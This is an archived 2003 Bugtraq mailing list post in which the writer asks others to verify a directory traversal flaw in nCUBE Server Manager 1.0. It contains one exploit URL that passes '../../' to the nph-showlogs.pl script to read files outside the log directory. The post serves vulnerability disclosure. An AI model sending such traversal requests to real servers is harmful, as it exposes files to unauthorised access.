Bugtraq mailing list archives

nCUBE Server Manager


From: <bug_hunt () hotmail com>
Date: 10 Nov 2003 00:59:56 -0000



can anybody verify this bug in 
nCUBE Server Manager (nSM) Version 1.0

i found a server where i can do a Directory Traversal!
using the following url:

http://server.com/cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0





Current thread: